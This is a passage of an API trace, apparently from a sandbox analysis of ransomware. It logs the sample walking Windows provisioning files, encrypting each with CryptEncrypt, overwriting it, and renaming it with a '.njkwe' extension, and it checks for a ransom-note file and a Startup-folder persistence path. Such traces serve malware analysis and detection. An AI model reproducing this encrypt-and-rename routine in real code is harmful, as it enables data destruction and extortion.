(Indonesia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\197__connections_cellular_telkomsel (indonesia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.250] GetProcessHeap () returned 0xbe0000 [0077.250] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.250] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90759156, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90759156, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90759156, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="198__Connections_Cellular_Telkomsel (Indonesia)_i1$(__MVID)@WAP.provxml", cAlternateFileName="198__C~1.PRO")) returned 1 [0077.250] lstrcmpiW (lpString1="198__Connections_Cellular_Telkomsel (Indonesia)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.250] lstrcmpiW (lpString1="198__Connections_Cellular_Telkomsel (Indonesia)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.250] lstrcmpiW (lpString1="198__Connections_Cellular_Telkomsel (Indonesia)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.250] lstrcmpiW (lpString1="198__Connections_Cellular_Telkomsel (Indonesia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.250] lstrcmpiW (lpString1="198__Connections_Cellular_Telkomsel (Indonesia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.250] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\198__Connections_Cellular_Telkomsel (Indonesia)_i1$(__MVID)@WAP.provxml") returned 165 [0077.250] StrStrIW (lpFirst="198__Connections_Cellular_Telkomsel (Indonesia)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.250] lstrcmpW (lpString1="198__Connections_Cellular_Telkomsel (Indonesia)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.250] lstrcmpW (lpString1="198__Connections_Cellular_Telkomsel (Indonesia)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.250] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\198__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.250] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\198__Connections_Cellular_Telkomsel (Indonesia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\198__connections_cellular_telkomsel (indonesia)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.251] GetTickCount () returned 0x1153a65 [0077.251] GetTickCount () returned 0x1153a65 [0077.251] GetTickCount () returned 0x1153a65 [0077.251] GetTickCount () returned 0x1153a65 [0077.251] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.251] GetProcessHeap () returned 0xbe0000 [0077.251] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.251] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cd, lpOverlapped=0x0) returned 1 [0077.252] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.252] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cd, lpOverlapped=0x0) returned 1 [0077.252] GetProcessHeap () returned 0xbe0000 [0077.252] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.252] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.252] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.253] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.253] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.253] CloseHandle (hObject=0x43c) returned 1 [0077.253] GetProcessHeap () returned 0xbe0000 [0077.253] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.253] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\198__Connections_Cellular_Telkomsel (Indonesia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0077.253] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\198__Connections_Cellular_Telkomsel (Indonesia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\198__connections_cellular_telkomsel (indonesia)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\198__Connections_Cellular_Telkomsel (Indonesia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\198__connections_cellular_telkomsel (indonesia)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.253] GetProcessHeap () returned 0xbe0000 [0077.253] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.254] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9077f3c5, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9077f3c5, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9077f3c5, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="199__Connections_Cellular_Vodafone (Indonesia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="199__C~1.PRO")) returned 1 [0077.254] lstrcmpiW (lpString1="199__Connections_Cellular_Vodafone (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.254] lstrcmpiW (lpString1="199__Connections_Cellular_Vodafone (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.254] lstrcmpiW (lpString1="199__Connections_Cellular_Vodafone (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.254] lstrcmpiW (lpString1="199__Connections_Cellular_Vodafone (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.254] lstrcmpiW (lpString1="199__Connections_Cellular_Vodafone (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.254] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\199__Connections_Cellular_Vodafone (Indonesia)_i0$(__MVID)@WAP.provxml") returned 164 [0077.254] StrStrIW (lpFirst="199__Connections_Cellular_Vodafone (Indonesia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.254] lstrcmpW (lpString1="199__Connections_Cellular_Vodafone (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.254] lstrcmpW (lpString1="199__Connections_Cellular_Vodafone (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.254] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\199__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.254] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\199__Connections_Cellular_Vodafone (Indonesia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\199__connections_cellular_vodafone (indonesia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.254] GetTickCount () returned 0x1153a65 [0077.254] GetTickCount () returned 0x1153a65 [0077.254] GetTickCount () returned 0x1153a65 [0077.254] GetTickCount () returned 0x1153a65 [0077.254] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.254] GetProcessHeap () returned 0xbe0000 [0077.254] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.254] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0077.256] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.256] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0077.256] GetProcessHeap () returned 0xbe0000 [0077.256] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.256] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.256] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.256] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.256] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.256] CloseHandle (hObject=0x43c) returned 1 [0077.256] GetProcessHeap () returned 0xbe0000 [0077.256] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.257] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\199__Connections_Cellular_Vodafone (Indonesia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0077.257] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\199__Connections_Cellular_Vodafone (Indonesia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\199__connections_cellular_vodafone (indonesia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\199__Connections_Cellular_Vodafone (Indonesia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\199__connections_cellular_vodafone (indonesia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.257] GetProcessHeap () returned 0xbe0000 [0077.257] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.257] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90163088, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90163088, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90163088, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="19__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="19__CE~1.PRO")) returned 1 [0077.257] lstrcmpiW (lpString1="19__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0077.257] lstrcmpiW (lpString1="19__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0077.257] lstrcmpiW (lpString1="19__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0077.257] lstrcmpiW (lpString1="19__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0077.257] lstrcmpiW (lpString1="19__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0077.257] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\19__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 146 [0077.257] StrStrIW (lpFirst="19__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0077.257] lstrcmpW (lpString1="19__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.257] lstrcmpW (lpString1="19__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0077.258] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\19__Cellular_", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.258] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\19__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\19__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.258] GetTickCount () returned 0x1153a65 [0077.258] GetTickCount () returned 0x1153a65 [0077.258] GetTickCount () returned 0x1153a65 [0077.258] GetTickCount () returned 0x1153a65 [0077.258] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.258] GetProcessHeap () returned 0xbe0000 [0077.259] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.259] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1e2, lpOverlapped=0x0) returned 1 [0077.260] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.260] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1e2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1e2, lpOverlapped=0x0) returned 1 [0077.260] GetProcessHeap () returned 0xbe0000 [0077.260] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.260] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.260] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.261] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.261] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.261] CloseHandle (hObject=0x43c) returned 1 [0077.261] GetProcessHeap () returned 0xbe0000 [0077.261] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.261] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\19__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 166 [0077.261] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\19__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\19__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\19__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\19__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.271] GetProcessHeap () returned 0xbe0000 [0077.271] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.271] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900ca6de, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x900ca6de, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x900ca6de, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1__Connections_Cellular_Vodafone Albania (Albania)_i0$(__MVID)@WAP.provxml", cAlternateFileName="1__CON~1.PRO")) returned 1 [0077.271] lstrcmpiW (lpString1="1__Connections_Cellular_Vodafone Albania (Albania)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.271] lstrcmpiW (lpString1="1__Connections_Cellular_Vodafone Albania (Albania)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.271] lstrcmpiW (lpString1="1__Connections_Cellular_Vodafone Albania (Albania)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.271] lstrcmpiW (lpString1="1__Connections_Cellular_Vodafone Albania (Albania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.271] lstrcmpiW (lpString1="1__Connections_Cellular_Vodafone Albania (Albania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.271] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\1__Connections_Cellular_Vodafone Albania (Albania)_i0$(__MVID)@WAP.provxml") returned 168 [0077.271] StrStrIW (lpFirst="1__Connections_Cellular_Vodafone Albania (Albania)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.271] lstrcmpW (lpString1="1__Connections_Cellular_Vodafone Albania (Albania)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.271] lstrcmpW (lpString1="1__Connections_Cellular_Vodafone Albania (Albania)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.271] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\1__Connection", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.271] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\1__Connections_Cellular_Vodafone Albania (Albania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\1__connections_cellular_vodafone albania (albania)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.271] GetTickCount () returned 0x1153a75 [0077.271] GetTickCount () returned 0x1153a75 [0077.271] GetTickCount () returned 0x1153a75 [0077.271] GetTickCount () returned 0x1153a75 [0077.271] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.272] GetProcessHeap () returned 0xbe0000 [0077.272] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.272] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d6, lpOverlapped=0x0) returned 1 [0077.276] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.276] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d6, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d6, lpOverlapped=0x0) returned 1 [0077.276] GetProcessHeap () returned 0xbe0000 [0077.276] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.276] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.276] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.276] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.277] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, 